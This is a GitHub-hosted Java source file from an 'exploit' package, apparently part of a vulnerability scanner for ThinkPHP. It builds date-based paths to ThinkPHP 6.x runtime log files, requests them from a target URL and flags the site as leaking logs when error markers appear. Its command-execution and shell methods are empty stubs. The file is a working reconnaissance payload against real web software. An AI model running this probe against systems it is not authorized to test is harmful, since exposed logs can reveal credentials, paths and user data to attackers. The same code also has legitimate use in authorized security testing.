FilesExpand file tree

 main

/

tp6_log.java

Copy path

Blame

More file actions

Blame

More file actions

Latest commit

 

History

History

History

executable file

·

52 lines (47 loc) · 1.66 KB

 main

/

tp6_log.java

Top

File metadata and controls

• Code
• Blame

executable file

·

52 lines (47 loc) · 1.66 KB

Raw

Copy raw file

Download raw file

Open symbols panel

Edit and raw actions

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

package exploit;

import com.github.kevinsawicki.http.HttpRequest;

import util.BasePayload;

import util.Result;

import java.util.ArrayList;

import java.util.Date;

/**

* Author 莲花 2021/9/12

*/

public class tp6_log implements BasePayload {

@Override

public Result checkVUL(String url) throws Exception {

Date dt = new Date();

String year = String.format("%tY", dt);

String CheckStr = "RunTime";

String CheckErr = "[ error ]";

String mon = String.format("%tm", dt);

String day = String.format("%td", dt);

String suffix1 = year + mon + "/" + day + ".log";

ArrayList<String> payload_urls = new ArrayList<String>() {{

add(url + "/runtime/log/" + suffix1);

add(url + "/runtime/log/Home/" + suffix1);

add(url + "/runtime/log/Common/" + suffix1);

add(url + "/runtime/log/Admin/" + suffix1);

}};

try {

for (String payload_url : payload_urls) {

System.out.println(payload_url);

String res = HttpRequest.get(payload_url).body();

if (res.contains(CheckStr) || res.contains(CheckErr)) {

return new Result(true, "ThinkPHP 6.x 日志泄露", payload_url);

}

}

} catch (Exception e) {

e.printStackTrace();

}

return new Result(false, "ThinkPHP 6.x 日志泄露", "");

}

@Override

public Result exeVUL(String url, String cmd) throws Exception {

return new Result(false, "", "");

}

@Override

public Result getShell(String url) throws Exception {

return new Result(false, "", "");

}

}